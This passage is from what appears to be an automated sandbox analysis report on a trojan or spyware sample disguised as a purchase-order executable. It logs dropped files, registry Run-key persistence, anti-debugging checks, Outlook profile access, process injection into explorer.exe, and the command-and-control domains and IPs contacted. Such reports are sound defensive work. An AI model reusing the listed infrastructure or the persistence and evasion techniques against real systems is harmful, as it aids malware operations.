          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_004229BB2_2_004229BB
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_004222FF2_2_004222FF
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0040B4422_2_0040B442
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0040B4472_2_0040B447
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0042140D2_2_0042140D
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_004044C52_2_004044C5
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_004044C72_2_004044C7
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0040FE772_2_0040FE77
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_004226012_2_00422601
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_004046E72_2_004046E7
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: String function: 0024D940 appears 64 times
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: String function: 002525B4 appears 36 times
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0041E097 NtAllocateVirtualMemory,2_2_0041E097
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_004012B0 EntryPoint,NtProtectVirtualMemory,2_2_004012B0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0041DEB7 NtCreateFile,2_2_0041DEB7
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0041DF67 NtReadFile,2_2_0041DF67
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0041DFE7 NtClose,2_2_0041DFE7
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_004014E9 NtProtectVirtualMemory,2_2_004014E9
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0041DEB1 NtCreateFile,2_2_0041DEB1
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0041DF61 NtReadFile,2_2_0041DF61
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0041DF09 NtReadFile,2_2_0041DF09
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0041DFE1 NtClose,2_2_0041DFE1
          Source: New PO-RJ-IN-003 - Knauf Queimados.exeReversingLabs: Detection: 27%
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeFile read: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeJump to behavior
          Source: New PO-RJ-IN-003 - Knauf Queimados.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeProcess created: C:\Users\user\AppData\Local\Temp\jaxdij.exe "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeProcess created: C:\Users\user\AppData\Local\Temp\jaxdij.exe "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe "C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe" "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\L
          Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 476
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe "C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe" "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\L
          Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6040 -s 444
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeProcess created: C:\Users\user\AppData\Local\Temp\jaxdij.exe "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.kJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeProcess created: C:\Users\user\AppData\Local\Temp\jaxdij.exe "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.kJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe "C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe" "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\LJump to behavior
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeFile created: C:\Users\user\AppData\Roaming\fqkyibJump to behavior
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeFile created: C:\Users\user\AppData\Local\Temp\nsqB9A2.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/14@19/15
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeCode function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004043F5
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5040
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6040
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCommand line argument: --headless1_2_002418D0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCommand line argument: --unix1_2_002418D0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCommand line argument: --width1_2_002418D0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCommand line argument: --height1_2_002418D0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCommand line argument: --signal1_2_002418D0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCommand line argument: --server1_2_002418D0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCommand line argument: --headless2_2_002418D0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCommand line argument: --unix2_2_002418D0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCommand line argument: --width2_2_002418D0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCommand line argument: --height2_2_002418D0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCommand line argument: --signal2_2_002418D0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCommand line argument: --server2_2_002418D0
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Binary string: wntdll.pdbUGP source: jaxdij.exe, 00000001.00000003.304952099.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, jaxdij.exe, 00000001.00000003.305442147.0000000002D20000.00000004.00001000.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.418718390.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000003.308889857.0000000000F6D000.00000004.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000003.310322417.0000000001101000.00000004.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.419932774.00000000013BF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.822319610.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.418994755.000000000452C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.416346932.000000000438A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.823052893.00000000047DF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: jaxdij.exe, 00000001.00000003.304952099.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, jaxdij.exe, 00000001.00000003.305442147.0000000002D20000.00000004.00001000.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.418718390.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000003.308889857.0000000000F6D000.00000004.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000003.310322417.0000000001101000.00000004.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.419932774.00000000013BF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.822319610.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.418994755.000000000452C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.416346932.000000000438A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.823052893.00000000047DF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: jaxdij.exe, 00000002.00000002.417087880.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.418036056.0000000001280000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: jaxdij.exe, 00000002.00000002.417087880.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.418036056.0000000001280000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_00255A55 push ecx; ret 1_2_00255A68
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_00255A55 push ecx; ret 2_2_00255A68
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0040A0C8 push ds; ret 2_2_0040A1AE
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0041A0F0 push ebp; iretd 2_2_0041A0F2
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0040A0A5 push ds; ret 2_2_0040A1AE
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0040A0B2 push ds; ret 2_2_0040A1AE
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_004210BC push eax; ret 2_2_0042110F
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_00421173 push eax; ret 2_2_00421179
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_00421109 push eax; ret 2_2_0042110F
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_00421112 push eax; ret 2_2_00421179
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0041DA4D push cs; ret 2_2_0041DA4E
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0040EA5A pushfd ; ret 2_2_0040EA63
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_00405220 push ebx; retf 2_2_00405223
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0041AA80 push esi; iretd 2_2_0041AA95
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0041837D push esp; retf 2_2_0041837F
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_00404D69 push ebx; iretd 2_2_00404D6B
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_00419DDD pushad ; retf 2_2_00419DDE
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_00409E35 push 265C611Bh; retf 2_2_00409E3A
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_00419E34 push 91A2CCF8h; ret 2_2_00419E3B
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0041AF2C push esi; retf 2_2_0041AF2D
          Source: jaxdij.exe.0.drStatic PE information: section name: .00cfg
          Source: jaxdij.exe.0.drStatic PE information: section name: .voltbl
          Source: rubthqnwyfue.exe.1.drStatic PE information: section name: .00cfg
          Source: rubthqnwyfue.exe.1.drStatic PE information: section name: .voltbl
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeFile created: C:\Users\user\AppData\Local\Temp\jaxdij.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeFile created: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run aekkvxebycaJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run aekkvxebycaJump to behavior
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exe TID: 4720Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 4720Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeAPI coverage: 2.0 %
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeAPI coverage: 2.6 %
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405620
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,0_2_00405FF6
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeCode function: 0_2_00402654 FindFirstFileA,0_2_00402654
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_002552D3 FindFirstFileExW,1_2_002552D3
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_00255387 FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00255387
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_002552D3 FindFirstFileExW,2_2_002552D3
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_00255387 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00255387
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeAPI call chain: ExitProcess graph end nodegraph_0-3335
          Source: explorer.exe, 00000003.00000000.376337336.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.327757416.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000003.00000000.327757416.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.393885342.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.327757416.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.376337336.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_0025381A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0025381A
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_002525CB GetProcessHeap,1_2_002525CB
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_002500DE mov ecx, dword ptr fs:[00000030h]1_2_002500DE
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_002541CD mov eax, dword ptr fs:[00000030h]1_2_002541CD
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_002500DE mov ecx, dword ptr fs:[00000030h]2_2_002500DE
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_002541CD mov eax, dword ptr fs:[00000030h]2_2_002541CD
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0040C307 LdrLoadDll,2_2_0040C307
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_0024D760 SetUnhandledExceptionFilter,1_2_0024D760
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_0025381A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0025381A
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_0024DC6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0024DC6D
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_0024D76C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0024D76C
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0025381A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0025381A
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0024DC6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0024DC6D
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0024D760 SetUnhandledExceptionFilter,2_2_0024D760
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0024D76C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0024D76C

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.publickit.website
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.65 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.dailyheraldresearch.com
          Source: C:\Windows\explorer.exeDomain query: www.ybkos.link
          Source: C:\Windows\explorer.exeDomain query: www.tommy57.shop
          Source: C:\Windows\explorer.exeNetwork Connect: 38.40.166.195 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 62.233.121.61 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.oonrreward.xyz
          Source: C:\Windows\explorer.exeDomain query: www.frwqc.com
          Source: C:\Windows\explorer.exeNetwork Connect: 178.208.83.20 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.214.243 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.121.81 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lee-perez.com
          Source: C:\Windows\explorer.exeNetwork Connect: 206.83.40.92 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.15.81 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.davidemarone.com
          Source: C:\Windows\explorer.exeDomain query: www.porggiret.site
          Source: C:\Windows\explorer.exeNetwork Connect: 93.179.127.27 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.111.12.177 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.214 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.bookmygennie.com
          Source: C:\Windows\explorer.exeDomain query: www.gmrsnodes.com
